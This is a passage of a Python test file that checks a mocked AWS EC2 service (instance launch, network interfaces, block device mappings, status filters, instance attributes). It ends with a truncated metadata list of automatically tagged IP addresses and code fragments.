instance[""SubnetId""].should.equal(subnet_id)
instance[""PrivateIpAddress""].should.equal(""127.0.0.1"")
@mock_ec2
def test_run_instance_mapped_public_ipv4():
client = boto3.client(""ec2"", region_name=""eu-central-1"")
vpc_cidr = ipaddress.ip_network(""192.168.42.0/24"")
subnet_cidr = ipaddress.ip_network(""192.168.42.0/25"")
resp = client.create_vpc(
CidrBlock=str(vpc_cidr),
AmazonProvidedIpv6CidrBlock=False,
DryRun=False,
InstanceTenancy=""default"",
)
vpc_id = resp[""Vpc""][""VpcId""]
resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)
subnet_id = resp[""Subnet""][""SubnetId""]
client.modify_subnet_attribute(
SubnetId=subnet_id, MapPublicIpOnLaunch={""Value"": True}
)
resp = client.run_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id
)
instance = resp[""Instances""][0]
instance.should.contain(""PublicDnsName"")
instance.should.contain(""PublicIpAddress"")
len(instance[""PublicDnsName""]).should.be.greater_than(0)
len(instance[""PublicIpAddress""]).should.be.greater_than(0)
@mock_ec2_deprecated
def test_run_instance_with_nic_autocreated():
conn = boto.connect_vpc(""the_key"", ""the_secret"")
vpc = conn.create_vpc(""10.0.0.0/16"")
subnet = conn.create_subnet(vpc.id, ""10.0.0.0/18"")
security_group1 = conn.create_security_group(
""test security group #1"", ""this is a test security group""
)
security_group2 = conn.create_security_group(
""test security group #2"", ""this is a test security group""
)
private_ip = ""127.0.0.1""
reservation = conn.run_instances(
EXAMPLE_AMI_ID,
subnet_id=subnet.id,
security_groups=[security_group1.name],
security_group_ids=[security_group2.id],
private_ip_address=private_ip,
)
instance = reservation.instances[0]
all_enis = conn.get_all_network_interfaces()
all_enis.should.have.length_of(1)
eni = all_enis[0]
instance.interfaces.should.have.length_of(1)
instance.interfaces[0].id.should.equal(eni.id)
instance.subnet_id.should.equal(subnet.id)
instance.groups.should.have.length_of(2)
set([group.id for group in instance.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
eni.subnet_id.should.equal(subnet.id)
eni.groups.should.have.length_of(2)
set([group.id for group in eni.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
eni.private_ip_addresses.should.have.length_of(1)
eni.private_ip_addresses[0].private_ip_address.should.equal(private_ip)
@mock_ec2_deprecated
def test_run_instance_with_nic_preexisting():
conn = boto.connect_vpc(""the_key"", ""the_secret"")
vpc = conn.create_vpc(""10.0.0.0/16"")
subnet = conn.create_subnet(vpc.id, ""10.0.0.0/18"")
security_group1 = conn.create_security_group(
""test security group #1"", ""this is a test security group""
)
security_group2 = conn.create_security_group(
""test security group #2"", ""this is a test security group""
)
private_ip = ""127.0.0.1""
eni = conn.create_network_interface(
subnet.id, private_ip, groups=[security_group1.id]
)
# Boto requires NetworkInterfaceCollection of NetworkInterfaceSpecifications...
# annoying, but generates the desired querystring.
from boto.ec2.networkinterface import (
NetworkInterfaceSpecification,
NetworkInterfaceCollection,
)
interface = NetworkInterfaceSpecification(
network_interface_id=eni.id, device_index=0
)
interfaces = NetworkInterfaceCollection(interface)
# end Boto objects
reservation = conn.run_instances(
EXAMPLE_AMI_ID,
network_interfaces=interfaces,
security_group_ids=[security_group2.id],
)
instance = reservation.instances[0]
instance.subnet_id.should.equal(subnet.id)
all_enis = conn.get_all_network_interfaces()
all_enis.should.have.length_of(1)
instance.interfaces.should.have.length_of(1)
instance_eni = instance.interfaces[0]
instance_eni.id.should.equal(eni.id)
instance_eni.subnet_id.should.equal(subnet.id)
instance_eni.groups.should.have.length_of(2)
set([group.id for group in instance_eni.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
instance_eni.private_ip_addresses.should.have.length_of(1)
instance_eni.private_ip_addresses[0].private_ip_address.should.equal(private_ip)
@requires_boto_gte(""2.32.0"")
@mock_ec2_deprecated
def test_instance_with_nic_attach_detach():
conn = boto.connect_vpc(""the_key"", ""the_secret"")
vpc = conn.create_vpc(""10.0.0.0/16"")
subnet = conn.create_subnet(vpc.id, ""10.0.0.0/18"")
security_group1 = conn.create_security_group(
""test security group #1"", ""this is a test security group""
)
security_group2 = conn.create_security_group(
""test security group #2"", ""this is a test security group""
)
reservation = conn.run_instances(
EXAMPLE_AMI_ID, security_group_ids=[security_group1.id]
)
instance = reservation.instances[0]
eni = conn.create_network_interface(subnet.id, groups=[security_group2.id])
# Check initial instance and ENI data
instance.interfaces.should.have.length_of(1)
eni.groups.should.have.length_of(1)
set([group.id for group in eni.groups]).should.equal(set([security_group2.id]))
# Attach
with pytest.raises(EC2ResponseError) as ex:
conn.attach_network_interface(eni.id, instance.id, device_index=1, dry_run=True)
ex.value.error_code.should.equal(""DryRunOperation"")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
""An error occurred (DryRunOperation) when calling the AttachNetworkInterface operation: Request would have succeeded, but DryRun flag is set""
)
conn.attach_network_interface(eni.id, instance.id, device_index=1)
# Check attached instance and ENI data
instance.update()
instance.interfaces.should.have.length_of(2)
instance_eni = instance.interfaces[1]
instance_eni.id.should.equal(eni.id)
instance_eni.groups.should.have.length_of(2)
set([group.id for group in instance_eni.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
eni = conn.get_all_network_interfaces(filters={""network-interface-id"": eni.id})[0]
eni.groups.should.have.length_of(2)
set([group.id for group in eni.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
# Detach
with pytest.raises(EC2ResponseError) as ex:
conn.detach_network_interface(instance_eni.attachment.id, dry_run=True)
ex.value.error_code.should.equal(""DryRunOperation"")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
""An error occurred (DryRunOperation) when calling the DetachNetworkInterface operation: Request would have succeeded, but DryRun flag is set""
)
conn.detach_network_interface(instance_eni.attachment.id)
# Check detached instance and ENI data
instance.update()
instance.interfaces.should.have.length_of(1)
eni = conn.get_all_network_interfaces(filters={""network-interface-id"": eni.id})[0]
eni.groups.should.have.length_of(1)
set([group.id for group in eni.groups]).should.equal(set([security_group2.id]))
# Detach with invalid attachment ID
with pytest.raises(EC2ResponseError) as cm:
conn.detach_network_interface(""eni-attach-1234abcd"")
cm.value.code.should.equal(""InvalidAttachmentID.NotFound"")
cm.value.status.should.equal(400)
cm.value.request_id.should_not.be.none
@mock_ec2_deprecated
def test_ec2_classic_has_public_ip_address():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name=""keypair_name"")
instance = reservation.instances[0]
instance.ip_address.should_not.equal(None)
instance.public_dns_name.should.contain(instance.ip_address.replace(""."", ""-""))
instance.private_ip_address.should_not.equal(None)
instance.private_dns_name.should.contain(
instance.private_ip_address.replace(""."", ""-"")
)
@mock_ec2_deprecated
def test_run_instance_with_keypair():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name=""keypair_name"")
instance = reservation.instances[0]
instance.key_name.should.equal(""keypair_name"")
@mock_ec2
def test_run_instance_with_block_device_mappings():
ec2_client = boto3.client(""ec2"", region_name=""us-east-1"")
kwargs = {
""MinCount"": 1,
""MaxCount"": 1,
""ImageId"": EXAMPLE_AMI_ID,
""KeyName"": ""the_key"",
""InstanceType"": ""t1.micro"",
""BlockDeviceMappings"": [{""DeviceName"": ""/dev/sda2"", ""Ebs"": {""VolumeSize"": 50}}],
}
ec2_client.run_instances(**kwargs)
instances = ec2_client.describe_instances()
volume = instances[""Reservations""][0][""Instances""][0][""BlockDeviceMappings""][0][
""Ebs""
]
volumes = ec2_client.describe_volumes(VolumeIds=[volume[""VolumeId""]])
volumes[""Volumes""][0][""Size""].should.equal(50)
@mock_ec2
def test_run_instance_with_block_device_mappings_missing_ebs():
ec2_client = boto3.client(""ec2"", region_name=""us-east-1"")
kwargs = {
""MinCount"": 1,
""MaxCount"": 1,
""ImageId"": EXAMPLE_AMI_ID,
""KeyName"": ""the_key"",
""InstanceType"": ""t1.micro"",
""BlockDeviceMappings"": [{""DeviceName"": ""/dev/sda2""}],
}
with pytest.raises(ClientError) as ex:
ec2_client.run_instances(**kwargs)
ex.value.response[""Error""][""Code""].should.equal(""MissingParameter"")
ex.value.response[""ResponseMetadata""][""HTTPStatusCode""].should.equal(400)
ex.value.response[""Error""][""Message""].should.equal(
""The request must contain the parameter ebs""
)
@mock_ec2
def test_run_instance_with_block_device_mappings_missing_size():
ec2_client = boto3.client(""ec2"", region_name=""us-east-1"")
kwargs = {
""MinCount"": 1,
""MaxCount"": 1,
""ImageId"": EXAMPLE_AMI_ID,
""KeyName"": ""the_key"",
""InstanceType"": ""t1.micro"",
""BlockDeviceMappings"": [
{""DeviceName"": ""/dev/sda2"", ""Ebs"": {""VolumeType"": ""standard""}}
],
}
with pytest.raises(ClientError) as ex:
ec2_client.run_instances(**kwargs)
ex.value.response[""Error""][""Code""].should.equal(""MissingParameter"")
ex.value.response[""ResponseMetadata""][""HTTPStatusCode""].should.equal(400)
ex.value.response[""Error""][""Message""].should.equal(
""The request must contain the parameter size or snapshotId""
)
@mock_ec2
def test_run_instance_with_block_device_mappings_from_snapshot():
ec2_client = boto3.client(""ec2"", region_name=""us-east-1"")
ec2_resource = boto3.resource(""ec2"", region_name=""us-east-1"")
volume_details = {
""AvailabilityZone"": ""1a"",
""Size"": 30,
}
volume = ec2_resource.create_volume(**volume_details)
snapshot = volume.create_snapshot()
kwargs = {
""MinCount"": 1,
""MaxCount"": 1,
""ImageId"": EXAMPLE_AMI_ID,
""KeyName"": ""the_key"",
""InstanceType"": ""t1.micro"",
""BlockDeviceMappings"": [
{""DeviceName"": ""/dev/sda2"", ""Ebs"": {""SnapshotId"": snapshot.snapshot_id}}
],
}
ec2_client.run_instances(**kwargs)
instances = ec2_client.describe_instances()
volume = instances[""Reservations""][0][""Instances""][0][""BlockDeviceMappings""][0][
""Ebs""
]
volumes = ec2_client.describe_volumes(VolumeIds=[volume[""VolumeId""]])
volumes[""Volumes""][0][""Size""].should.equal(30)
volumes[""Volumes""][0][""SnapshotId""].should.equal(snapshot.snapshot_id)
@mock_ec2_deprecated
def test_describe_instance_status_no_instances():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
all_status = conn.get_all_instance_status()
len(all_status).should.equal(0)
@mock_ec2_deprecated
def test_describe_instance_status_with_instances():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
conn.run_instances(EXAMPLE_AMI_ID, key_name=""keypair_name"")
all_status = conn.get_all_instance_status()
len(all_status).should.equal(1)
all_status[0].instance_status.status.should.equal(""ok"")
all_status[0].system_status.status.should.equal(""ok"")
@mock_ec2_deprecated
def test_describe_instance_status_with_instance_filter_deprecated():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
# We want to filter based on this one
reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name=""keypair_name"")
instance = reservation.instances[0]
# This is just to setup the test
conn.run_instances(EXAMPLE_AMI_ID, key_name=""keypair_name"")
all_status = conn.get_all_instance_status(instance_ids=[instance.id])
len(all_status).should.equal(1)
all_status[0].id.should.equal(instance.id)
# Call get_all_instance_status with a bad id should raise an error
with pytest.raises(EC2ResponseError) as cm:
conn.get_all_instance_status(instance_ids=[instance.id, ""i-1234abcd""])
cm.value.code.should.equal(""InvalidInstanceID.NotFound"")
cm.value.status.should.equal(400)
cm.value.request_id.should_not.be.none
@mock_ec2
def test_describe_instance_credit_specifications():
conn = boto3.client(""ec2"", region_name=""us-west-1"")
# We want to filter based on this one
reservation = conn.run_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
result = conn.describe_instance_credit_specifications(
InstanceIds=[reservation[""Instances""][0][""InstanceId""]]
)
assert (
result[""InstanceCreditSpecifications""][0][""InstanceId""]
== reservation[""Instances""][0][""InstanceId""]
)
@mock_ec2
def test_describe_instance_status_with_instance_filter():
conn = boto3.client(""ec2"", region_name=""us-west-1"")
# We want to filter based on this one
reservation = conn.run_instances(ImageId=EXAMPLE_AMI_ID, MinCount=3, MaxCount=3)
instance1 = reservation[""Instances""][0]
instance2 = reservation[""Instances""][1]
instance3 = reservation[""Instances""][2]
conn.stop_instances(InstanceIds=[instance1[""InstanceId""]])
stopped_instance_ids = [instance1[""InstanceId""]]
running_instance_ids = sorted([instance2[""InstanceId""], instance3[""InstanceId""]])
all_instance_ids = sorted(stopped_instance_ids + running_instance_ids)
# Filter instance using the state name
state_name_filter = {
""running_and_stopped"": [
{""Name"": ""instance-state-name"", ""Values"": [""running"", ""stopped""]}
],
""running"": [{""Name"": ""instance-state-name"", ""Values"": [""running""]}],
""stopped"": [{""Name"": ""instance-state-name"", ""Values"": [""stopped""]}],
}
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_name_filter[""running_and_stopped""]
)[""InstanceStatuses""]
found_instance_ids = [status[""InstanceId""] for status in found_statuses]
sorted(found_instance_ids).should.equal(all_instance_ids)
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_name_filter[""running""]
)[""InstanceStatuses""]
found_instance_ids = [status[""InstanceId""] for status in found_statuses]
sorted(found_instance_ids).should.equal(running_instance_ids)
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_name_filter[""stopped""]
)[""InstanceStatuses""]
found_instance_ids = [status[""InstanceId""] for status in found_statuses]
sorted(found_instance_ids).should.equal(stopped_instance_ids)
# Filter instance using the state code
state_code_filter = {
""running_and_stopped"": [
{""Name"": ""instance-state-code"", ""Values"": [""16"", ""80""]}
],
""running"": [{""Name"": ""instance-state-code"", ""Values"": [""16""]}],
""stopped"": [{""Name"": ""instance-state-code"", ""Values"": [""80""]}],
}
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_code_filter[""running_and_stopped""]
)[""InstanceStatuses""]
found_instance_ids = [status[""InstanceId""] for status in found_statuses]
sorted(found_instance_ids).should.equal(all_instance_ids)
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_code_filter[""running""]
)[""InstanceStatuses""]
found_instance_ids = [status[""InstanceId""] for status in found_statuses]
sorted(found_instance_ids).should.equal(running_instance_ids)
found_statuses = conn.describe_instance_status(
IncludeAllInstances=True, Filters=state_code_filter[""stopped""]
)[""InstanceStatuses""]
found_instance_ids = [status[""InstanceId""] for status in found_statuses]
sorted(found_instance_ids).should.equal(stopped_instance_ids)
@requires_boto_gte(""2.32.0"")
@mock_ec2_deprecated
def test_describe_instance_status_with_non_running_instances():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.stop()
instance2.terminate()
all_running_status = conn.get_all_instance_status()
all_running_status.should.have.length_of(1)
all_running_status[0].id.should.equal(instance3.id)
all_running_status[0].state_name.should.equal(""running"")
all_status = conn.get_all_instance_status(include_all_instances=True)
all_status.should.have.length_of(3)
status1 = next((s for s in all_status if s.id == instance1.id), None)
status1.state_name.should.equal(""stopped"")
status2 = next((s for s in all_status if s.id == instance2.id), None)
status2.state_name.should.equal(""terminated"")
status3 = next((s for s in all_status if s.id == instance3.id), None)
status3.state_name.should.equal(""running"")
@mock_ec2_deprecated
def test_get_instance_by_security_group():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
conn.run_instances(EXAMPLE_AMI_ID)
instance = conn.get_only_instances()[0]
security_group = conn.create_security_group(""test"", ""test"")
with pytest.raises(EC2ResponseError) as ex:
conn.modify_instance_attribute(
instance.id, ""groupSet"", [security_group.id], dry_run=True
)
ex.value.error_code.should.equal(""DryRunOperation"")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
""An error occurred (DryRunOperation) when calling the ModifyInstanceSecurityGroups operation: Request would have succeeded, but DryRun flag is set""
)
conn.modify_instance_attribute(instance.id, ""groupSet"", [security_group.id])
security_group_instances = security_group.instances()
assert len(security_group_instances) == 1
assert security_group_instances[0].id == instance.id
@mock_ec2
def test_modify_delete_on_termination():
ec2_client = boto3.resource(""ec2"", region_name=""us-west-1"")
result = ec2_client.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
instance = result[0]
instance.load()
instance.block_device_mappings[0][""Ebs""][""DeleteOnTermination""].should.be(True)
instance.modify_attribute(
BlockDeviceMappings=[
{""DeviceName"": ""/dev/sda1"", ""Ebs"": {""DeleteOnTermination"": False}}
]
)
instance.load()
instance.block_device_mappings[0][""Ebs""][""DeleteOnTermination""].should.be(False)
@mock_ec2
def test_create_instance_ebs_optimized():
ec2_resource = boto3.resource(""ec2"", region_name=""eu-west-1"")
instance = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, EbsOptimized=True
)[0]
instance.load()
instance.ebs_optimized.should.be(True)
instance.modify_attribute(EbsOptimized={""Value"": False})
instance.load()
instance.ebs_optimized.should.be(False)
instance = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1,
)[0]
instance.load()
instance.ebs_optimized.should.be(False)
@mock_ec2
def test_run_multiple_instances_in_same_command():
instance_count = 4
client = boto3.client(""ec2"", region_name=""us-east-1"")
client.run_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=instance_count, MaxCount=instance_count
)
reservations = client.describe_instances()[""Reservations""]
reservations[0][""Instances""].should.have.length_of(instance_count)
instances = reservations[0][""Instances""]
for i in range(0, instance_count):
instances[i][""AmiLaunchIndex""].should.be(i)
@mock_ec2
def test_describe_instance_attribute():
client = boto3.client(""ec2"", region_name=""us-east-1"")
security_group_id = client.create_security_group(
GroupName=""test security group"", Description=""this is a test security group""
)[""GroupId""]
client.run_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
SecurityGroupIds=[security_group_id],
)
instance_id = client.describe_instances()[""Reservations""][0][""Instances""][0][
""InstanceId""
]
valid_instance_attributes = [
""instanceType"",
""kernel"",
""ramdisk"",
""userData"",
""disableApiTermination"",
""instanceInitiatedShutdownBehavior"",
""rootDeviceName"",
""blockDeviceMapping"",
""productCodes"",
""sourceDestCheck"",
""groupSet"",
""ebsOptimized"",
""sriovNetSupport"",
]
for valid_instance_attribute in valid_instance_attributes:
response = client.describe_instance_attribute(
InstanceId=instance_id, Attribute=valid_instance_attribute
)
if valid_instance_attribute == ""groupSet"":
response.should.have.key(""Groups"")
response[""Groups""].should.have.length_of(1)
response[""Groups""][0][""GroupId""].should.equal(security_group_id)
elif valid_instance_attribute == ""userData"":
response.should.have.key(""UserData"")
response[""UserData""].should.be.empty
invalid_instance_attributes = [
""abc"",
""Kernel"",
""RamDisk"",
""userdata"",
""iNsTaNcEtYpE"",
]
for invalid_instance_attribute in invalid_instance_attributes:
with pytest.raises(ClientError) as ex:
client.describe_instance_attribute(
InstanceId=instance_id, Attribute=invalid_instance_attribute
)
ex.value.response[""Error""][""Code""].should.equal(""InvalidParameterValue"")
ex.value.response[""ResponseMetadata""][""HTTPStatusCode""].should.equal(400)
message = ""Value ({invalid_instance_attribute}) for parameter attribute is invalid. Unknown attribute."".format(
invalid_instance_attribute=invalid_instance_attribute
)
ex.value.response[""Error""][""Message""].should.equal(message)
@mock_ec2
def test_warn_on_invalid_ami():
if settings.TEST_SERVER_MODE:
raise SkipTest(""Can't capture warnings in server mode."")
ec2 = boto3.resource(""ec2"", ""us-east-1"")
with pytest.warns(
PendingDeprecationWarning,
match=r""Could not find AMI with image-id:invalid-ami.+"",
):
ec2.create_instances(ImageId=""invalid-ami"", MinCount=1, MaxCount=1)
",62433,"[['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.99.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['PERSON', 'conn = boto.connect_ec2'], ['PERSON', 'DryRun'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'zone=conn.region.name'], ['LOCATION', 'test_get_paginated_instances'], ['PERSON', 'conn = boto3.resource(""ec2'], ['PERSON', 'instance3'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['PERSON', 'conn = boto.connect_vpc(""the_key'], ['LOCATION', 'min_count=1'], ['LOCATION', 'min_count=1'], ['PERSON', 'min_count=1'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['PERSON', 'conn = boto3.resource(""ec2'], ['PERSON', 'conn = boto3.resource(""ec2'], ['PERSON', 'conn = boto3.resource(""ec2'], ['PERSON', 'conn = boto3.resource(""ec2'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'Boto'], ['PERSON', 'DryRun'], ['PERSON', 'test_user_data_with_run_instance'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_vpc(""the_key'], ['PERSON', 'instance.groups.should.have.length_of(2'], ['PERSON', 'conn = boto.connect_vpc(""the_key'], ['PERSON', 'Boto'], ['PERSON', 'instance.interfaces.should.have.length_of(1'], ['PERSON', 'conn = boto.connect_vpc(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'DryRun'], ['PERSON', 'instance.interfaces.should.have.length_of(1'], ['PERSON', 'conn.detach_network_interface(""eni-attach-1234abcd'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto3.client(""ec2'], ['PERSON', 'conn = boto3.client(""ec2'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['DATE_TIME', 'test_warn_on_invalid_ami'], ['DATE_TIME', '2014-01-01'], ['DATE_TIME', '2014-01-01'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.1.0.0'], ['IP_ADDRESS', '10.1.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['URL', 'boto.ec2.in'], ['URL', 'six.PY'], ['URL', 'base64.de'], ['URL', 'base64.de'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'boto.co'], ['URL', 'conn.ge'], ['URL', 'instance1.im'], ['URL', 'boto.ec2.co'], ['URL', 'conn.ru'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.ru'], ['URL', 'reservation.should.be'], ['URL', 'reservation.instances.sh'], ['URL', 'reservation.in'], ['URL', 'instance.state.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.id.sh'], ['URL', 'reservation.id'], ['URL', 'instances.sh'], ['URL', 'instance.id.sh'], ['URL', 'instance.id'], ['URL', 'instance.state.sh'], ['URL', 'instance.la'], ['URL', 'time.sh'], ['URL', 'id.sh'], ['URL', 'instance.placement.sh'], ['URL', 'instance.ro'], ['URL', '.status.sh'], ['URL', 'id.should.ma'], ['URL', 'conn.ge'], ['URL', 'volume.at'], ['URL', 'data.in'], ['URL', 'id.sh'], ['URL', 'instance.id'], ['URL', 'volume.status.sh'], ['URL', 'instance.id'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.id'], ['URL', 'conn.ge'], ['URL', 'instance.state.sh'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'resource.volumes.al'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'resource.volumes.al'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'volume.state.sh'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'instance.de'], ['URL', 'resource.volumes.al'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'instance.de'], ['URL', 'ex.value.re'], ['URL', 'InvalidAttachment.No'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'instance.in'], ['URL', 'boto.co'], ['URL', 'instances.when.ca'], ['URL', '.should.th'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.cr'], ['URL', 'conn.region.na'], ['URL', 'vol1.at'], ['URL', 'instance.id'], ['URL', 'conn.cr'], ['URL', 'conn.region.na'], ['URL', 'vol2.at'], ['URL', 'instance.id'], ['URL', 'conn.cr'], ['URL', 'conn.region.na'], ['URL', 'vol3.at'], ['URL', 'instance.id'], ['URL', 'conn.ge'], ['URL', 'mapping.sh'], ['URL', 'conn.ge'], ['URL', 'v.at'], ['URL', 'data.in'], ['URL', 'id.sh'], ['URL', 'instance.id'], ['URL', 'v.at'], ['URL', 'data.at'], ['URL', 'time.sh'], ['URL', 'instance.la'], ['URL', 'v.cr'], ['URL', 'time.sh'], ['URL', 'instance.la'], ['URL', 'v.region.name.sh'], ['URL', 'instance.region.na'], ['URL', 'v.status.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', 'reservations.sh'], ['URL', 'reservation.instances.sh'], ['URL', 'reservation.in'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'reservations.sh'], ['URL', 'reservation.instances.sh'], ['URL', 'instance.id'], ['URL', 'reservation.in'], ['URL', 'ids.sh'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', 'cm.value.code.sh'], ['URL', 'InvalidInstanceID.No'], ['URL', 'cm.value.status.sh'], ['URL', 'cm.value.re'], ['URL', 'id.sh'], ['URL', 'not.be.no'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'reservations.sh'], ['URL', 'token.sh'], ['URL', 'not.be.no'], ['URL', 'client.de'], ['URL', 'reservations.sh'], ['URL', 'resp2.ke'], ['URL', 'boto3.cl'], ['URL', 'ec2.ru'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'instance.id'], ['URL', 'instance2.id'], ['URL', 'instance3.id'], ['URL', 'conn.ge'], ['URL', 'instance2.id'], ['URL', 'reservations.sh'], ['URL', 'instance.id'], ['URL', 'ids.sh'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', '.instances.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.when.ca'], ['URL', '.should.th'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', '.instances.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'm1.sm'], ['URL', 'reservation1.in'], ['URL', 'conn.ru'], ['URL', 'm1.sm'], ['URL', 'reservation2.in'], ['URL', 'conn.ru'], ['URL', 'reservation3.in'], ['URL', 'conn.ge'], ['URL', 'm1.sm'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.instances.sh'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'conn.ge'], ['URL', 'm1.sm'], ['URL', 